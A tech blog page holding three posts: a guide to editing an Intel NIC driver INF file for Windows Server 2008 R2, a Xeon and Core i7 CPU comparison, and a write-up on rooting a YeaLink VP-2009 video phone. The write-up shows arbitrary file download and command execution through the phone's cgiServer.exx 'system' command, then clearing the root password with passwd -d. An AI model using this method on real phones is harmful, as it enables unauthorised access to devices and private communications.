Documentation, Hacking, Hardware, Microsoft, Server Technologies

How To: Intel 82579V Gigabit Network Connection – Windows Server 2008 R2

Clearly Intel doesn’t want us to install server OS onto desktop motherboards nowadays.

Look at your driver CD. Navigate to the PRO1000 folder; depending on whether you have 32bit or 64bit OS, you will then want either Win32 or Winx64 (not Win64 which is for Itanium).
The choice for the next folder will depend on your OS; NDIS5x is Server2003 or XP, NDIS61 is Server2008 or Vista, NDIS62 is Server2008R2 or 7, I presume NDIS63 is for Windows 8, Server 2012.

Copy the correct folder to your desktop.

In either case once you have chosen the correct folder you need to find the .inf starting e1c ; so for Server 2008 R2 64bit it will be called e1c62x64.inf. Ensure you are doing this on the copy that now exists on your desktop.

Open the file in notepad;

;******************************************************************************
; e1c62x64.INF (Intel 64-bit extension Platform Only,
; Windows 7 64-bit extension and Windows Server 2008 R2 64-bit extension)
;
; Intel(R) Gigabit Network connections
;******************************************************************************
;
[Version]
Signature = "$Windows NT$"
Class = Net
ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}
Provider = %Intel%
CatalogFile = e1c62x64.cat
DriverVer = 06/21/2012,11.16.96.0
[Manufacturer]
%Intel% = Intel, NTamd64.6.1, NTamd64.6.1.1, NTamd64.6.2
[ControlFlags]
ExcludeFromSelect = \ 
 PCI\VEN_8086&DEV_1502,\ 
 PCI\VEN_8086&DEV_1503
[Intel]
[Intel.NTamd64.6.1.1]
; DisplayName Section DeviceID
; ----------- ------- --------
%E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502
%E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_00011179
%E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_00021179
%E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_80001025
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00021179
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_80001025
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_04911025
[Intel.NTamd64.6.1]
; DisplayName Section DeviceID
; ----------- ------- --------
%E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502
%E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_00011179
%E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_00021179
%E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_80001025
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00021179
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_80001025
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_04911025

Open the file in notepad;

If you look in [ControlFlags], you see that there are two device IDs listed. DEV_1502 and DEV_1503.
If you go back to the new computer you built (with no NIC driver installed 🙂 ), in Device Manager, you should see “Ethernet Adapter” listed as an unknown device. Go into the Properties of that, then Details, Hardware Ids. Now, you see that the device should be DEV_1503. Great.

Go back to the notepad file you have open, you can see that under the second section within [Intel] you don’t have anything listed for DEV_1503 under [Intel.NTamd64.61]. Ironically, every other section has Server 2008 R2 provided for. Sneaky Intel, sneaky.

Anyway, copy and paste the two lines that provide for DEV_1503 in the [Intel.NTamd64.6.1.1] section to the new section, like above. Save the file.

Go back to the other computer that still has device manager open (it might be the same computer..), click Driver -> Update Driver, then manually select the desktop location of your NDIS62 directory you copied and then edited.

Driver should install successfully. Hit me up if your mileage varies.

Hardware

Time to retire the Dell M610 blade? What’s next?

Westmere X5762 vs Nehalem X5570

After analysis of Westmere vs Nehalem;

The gains aren’t small, but neither are they substantial enough to motivate upgrading from Nehalem to Westmere – only in select cases will the gains be in the 40-50% range. Similarly, the power efficiency improvements are nice, but not profound compared to the prior generation.

The clock-rate increase for the 95W TDP chips (including turbo boost) that can be used in the M610 is 3.2GHz to 3.6GHz (I lock my chips to 3.2GHz permanently by disabling all power management in the BIOS and I also disable hyperthreading. YMMV). You’re looking at a mathematical difference of 11%. The extra cost vs the gains support the original conclusion that the gains are not substantial enough to motivate the upgrade.

The Nehalem architecture was kick-ass, and remembering back to my benchmarks in 2008/2009, I saw a thread for thread 30% increase in capability.

If you’re looking at a multi-threaded application, you could see 20-40% increase in performance with the extra 2 cores. Perhaps virtualization would see the most benefit here. However, when you look at the price tag that STILL exists against the X5672 chips, it really looks less appealing than it could, if you were looking for a quick interim upgrade without replacing all your systems.

Again, your mileage may vary. For me, this isn’t a large enough gain to even warrant picking up a couple of chips to test them.

The Nehalem X5570

Interestingly,  from performance tuning my BIOS, my benchmark of the CPU resulted in interesting results compared to the one on CPU Benchmark’s website:

My result was an aggregate score of: 10,232 for CPU Benchmark.
The 2 results recorded on CPU Benchmark’s website: 6,025.

I cannot delve deeper into the tests submitted to the website, but I can only assume that something was wrong with their setup.
If I look at the Single Thread results for my CPU, it is completely (expectantly) destroyed by the Intel Ivy Bridge i7-3770k @ 3.5GHz. 70.1% faster. This is pretty impressive, and I think it warrants a further look into the modern CPUs and building a prototype system for further testing.

Faster, Faster, Faster

My initial research is showing that the best thread-for-thread CPU for applications that aren’t so multi-threaded seems to be the Intel® Xeon® Processor E3-1290V2 (8M Cache, 3.70 GHz) with turbo boost of 4.10GHz. It’s a 4 core chip with 8 threads (HT) on the 22nm lithography and only 87W TDP (wow!). Unfortunately, it looks like it will not accept a multi-CPU configuration system.  This might not be a problem for me.

Since I’m in the mix, I’m also looking at the Core i7-3770K 3.5GHz (3.9GHz turbo) chip. I bet this will run stable at 4.10GHz without much trouble. I understand it’s a desktop CPU, but the price alone make it worth a second look – especially if I’m thinking about self building. Clock for clock, thread for thread, this looks like a great chip. It holds its own against the E3-1290V2 at a fraction of the price. I have a 2600k at home stable for over a year at 4.5GHz.

A side by side of these two chips. They’re pretty similar.

Intel Core i7-3770K Intel Xeon E3-1290 v2
Intel Core i7-3770K Picture
is not
available
Specifications differences
Market segment Desktop Server
Manufacturer Intel
Family Intel Core i7 Intel Xeon
Model number i7-3770K E3-1290 v2
CPU part number CM8063701211700 CM8063701099101
Box part number BX80637I73770K
BXC80637I73770K
Core name Ivy Bridge Ivy Bridge-H2
Platform name Carlow
Microarchitecture Ivy Bridge
Technology (micron) 0.022
Socket Socket 1155
Frequency (MHz) 3500 3700
Turbo Frequency (MHz) 3900 / 3900 / 3800 / 3700 4100 / 4000 / 3900 / 3800
Clock Multiplier 35 37
L1 cache 128 KB (code) / 128 KB (data)
L2 cache (KB) 1024
L3 cache (KB) 8192
TDP (Watt) 77 87
Cores 4
Multiprocessing 1
Hacking, Hardware

YeaLink VP-2009 VOIP/Video Phone – r00ted, here’s how..

Awesome phone. Not so awesome code. It took me the best part of 6 hours, but I rooted the bitch. Guide to come!

Now, I just need to see what security risk this poses to me since I now use these phones professionally. Be careful if you use these in your office! At least it’s not so easy to change the actual phone software. It’s a compiled ARM binary. Pity, would have been nice to write custom modules for it. I think it uses some strange XML interface to display content, might be a way to make that display web content of your own choice.

Image

Rough guide:

view-source:192.168.1.114/cgi-bin/cgiServer.exx?

<html>
<head>
<title>syntax error</title>
</head>
<body>
Unkonw GET type : useage ?[page/download/command]=xxx
<br>
</body>
</html>

Oh look, I can download any file from the phone.

Hmm.. command? What is command? Well, we can grab the syslog and see what goes on in there..

Mar 29 10:42:47 mini_httpd[772]: mini_httpd.c(1466):path:/cgi-bin/cgiServer.exx,query:command=msgSendMessage(%22app_vpPhone%22,%220xa8004%22,%220%22,%220%22)

Interesting! Alright, so I dig through their web code and I find:

 function _SendMessage(thread, uMsg, wParam, lParam)

{

return “msgSendMessage(\”” + thread + “\”,\”” + uMsg + “\”,\”” + wParam +”\”,\”” + lParam + “\”)”;

}

I test that via URL, and it works. I think. No errors.

What else do I see here..

function _getFreeSpace(strpath)
{
        return "getFreeSpace(\"" + strpath + "\")";
}

Aha, this works too. With any path, via URL.

However, here’s the money shot right here.. interesting command:

function _system(cmd)
{
        return "system(\"" + cmd + "\")";
}

I see they make calls to it internally:

function doReboot()
{
//var formInput = document.formInput;
if(xmlHttpGet(_SendMessage(“app_vpPhone”, “0xa8004”, 0, 0)) == “1”)
{
alert(“Talking, Please save config later.”);
return;
}
if(confirm(” Do you want to reboot device?”))
{
jsShowPageStatus(“main-content”,”Rebooting , please wait …”, “server-status”);
xmlHttpPostAsyn(_system(“reboot >/dev/null 2>&1”), responseXmlHttp);
return;
}
}

So, let’s try reboot.. I execute the reboot command via the browser. Boom, it reboots.

After hours of screwing around and banging out recursive ls, df, contents of files, touching new files.. I figure out that they obfuscate user permissions for /etc/

Extract:

1 -rwxr-xr-x    1 1011     1002          601 May 13  2011 passwd

0 -rwxr-xr-x    1 1011     1002           31 May 13  2011 issue.net

0 -rwxr-xr-x    1 1011     1002          452 May 13  2011 nsswitch.conf

0 -rwxr-xr-x    1 1011     1002          421 May 13  2011 inputrc

2 drwxr-xr-x    1 1011     1002         2048 May 13  2011 dhcpc

0 -rwxr-xr-x    1 1011     1002           26 May 13  2011 host.conf

3 -rwxr-xr-x    1 1011     1002         2921 May 13  2011 inetd.conf

Still doesn’t explain why I cannot rm files I’ve created in /tmp or append with echo. I can only create with echo or touch!

Numerous attempts to add a user doesn’t work. The commands just don’t exist.
I look at the files I create with touch and oh dear oh dear, they’re created by root. No chroot ! Or even running as an unprivileged user!

I chown passwd to root:root and then I run passwd –d to remove password. I overwrite MOTD prior to this as a test, hence the ‘test’.

BAM, I’m in.

Footnote: Now I’ve firewalled this interface off from the rest of the users on my network. Don’t want anyone snooping in on private phone stuff!